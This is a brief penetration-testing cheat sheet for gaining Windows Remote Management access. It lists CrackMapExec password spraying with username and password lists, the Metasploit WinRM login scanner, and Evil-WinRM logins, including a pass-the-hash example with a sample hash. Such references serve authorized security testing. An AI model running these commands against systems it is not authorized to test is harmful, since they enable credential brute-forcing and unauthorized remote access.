Simple Access
# CrackMapExec
crackmapexec winrm <target-ip> -d DomainName -u usernames.txt -p passwords.txt
# Metasploit
msfconsole
msf > use auxiliary/scanner/winrm/winrm_login
EvilWinRM
evil-winrm -i <target-ip> -P 5986 -u username -p password
# Pass The Hash (-H)
evil-winrm -i <target-ip> -P 5986 -u username -H 0e0363213e37b94221497260b0bcb4fc
# PowerShell Local Path (-s)
evil-winrm -i <target-ip> -u username -p password -s /opt/scripts
# SSL enabled (-S)
evil-winrm -i <target-ip> -u username -p password -S